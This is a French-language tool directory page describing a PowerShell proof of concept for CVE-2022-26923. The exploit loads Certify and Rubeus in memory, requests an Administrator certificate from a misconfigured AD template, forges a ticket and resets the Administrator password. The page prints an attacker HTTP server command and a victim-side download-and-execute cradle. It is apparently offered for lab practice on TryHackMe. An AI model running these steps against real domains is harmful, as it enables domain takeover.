Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-26923-Powershell-POC — Un POC PowerShell pour charger et exécuter automatiquement Certify et Rubeus depuis la mémoire. | Kitploit
Outils/GitHubGitHub/lsecqt/cve-2022-26923-powershell-poc
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHublsecqt/cve-2022-26923-powershell-poc

CVE-2022-26923-Powershell-POC

Un POC PowerShell pour charger et exécuter automatiquement Certify et Rubeus depuis la mémoire.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1781il y a 4 ansPas encore vérifié

CVE-2022-26923-Powershell-POC

Un POC PowerShell pour charger et exécuter automatiquement Certify et Rubeus depuis la mémoire.

Comment ça fonctionne ?

  1. Charge Certify.exe et Rubeus.exe en mémoire.
  2. Scanne la machine cible à la recherche de modèles de certificats mal configurés. (plus d'informations sur https://www.youtube.com/watch?v=HBRCI5O35R8)
  3. Demande un certificat pour l'utilisateur Administrateur, basé sur le modèle vulnérable.
  4. Envoie le certificat au gestionnaire de certificats, qui le convertit au format .pfx et le renvoie au client.
  5. Utilise Rubeus pour charger le certificat et générer un ticket pour l'utilisateur Administrateur.
  6. Modifie le mot de passe de l'utilisateur Administrateur. (Uniquement pour la démo)

Le POC est testé sur le laboratoire TryHackMe suivant : https://tryhackme.com/room/adcertificatetemplates

Cette CVE est utilisée pour l'élévation de privilèges, donc aucune exploitation initiale n'est couverte dans cette démo, ni dans le laboratoire THM.

Étapes :

  1. python3 -m http.server 80 [Attacker Box]
  2. python3 uploader.py 8000 [Attacker Box]
  3. IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [Victim Box]

Remarque : Ce POC est à des fins éducatives, vous êtes responsable de vos propres actions.

Télécharger l’outil